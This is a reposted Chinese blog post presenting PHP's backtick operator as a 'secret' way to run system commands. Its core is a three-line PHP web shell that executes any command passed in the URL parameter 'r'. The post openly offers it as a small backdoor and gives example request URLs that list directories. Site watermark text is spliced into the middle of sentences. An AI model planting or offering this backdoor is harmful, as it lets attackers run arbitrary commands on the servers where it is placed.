• 欢迎访问搞代码网站,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站!
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏搞代码吧

<转载>一个官方没公布的php秘籍,可用作后门

php 搞代码 4年前 (2022-01-24) 11次浏览 已收录 0个评论

一个官方没有公布的php秘籍,可用作后门

可以看看

http://www.webshell.cc/3303.html

好奇怪的漏洞?

可以当做个小马使用,比较有意思的一个东西

写道

被过滤广告
发现这个也是巧合,我就直接说了吧

<?php
//t.php
$test = $_GET[‘r’];
echo `$test`;
?>大家看看这个代码有木有问题?

这里是我们自己的交流平台,是属于我们90sec所有成员的技术分享平台! 我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了,

信息安全团队 而且又不是单引号,这个就是关键所在了,这个符号是

。本文来源gao!%daima.com搞$代*!码网1

搞代gaodaima码Esc 下面的一个键 感叹号!旁边的,

专注信息安全通过 echo `系统命令`; 可以达到 system(); 一样的效果

如果不信的朋友可以测试

http://webshell.cc/t.php?r=dir

可以列出目录

http://webshell.cc/t.php?r=echo

我是马儿 D:\web\webshell.cc.php

大家觉得我没有忽悠 就赏点分哈

文章来自: WebShell’S Blog 本文地址:http://www.webshell.cc/3303.html

?

?

?

1 楼 hoodbc 2012-09-13

shell_exec 没有禁用


搞代码网(gaodaima.com)提供的所有资源部分来自互联网,如果有侵犯您的版权或其他权益,请说明详细缘由并提供版权或权益证明然后发送到邮箱[email protected],我们会在看到邮件的第一时间内为您处理,或直接联系QQ:872152909。本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:<转载>一个官方没公布的php秘籍,可用作后门

喜欢 (0)
[搞代码]
分享 (0)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址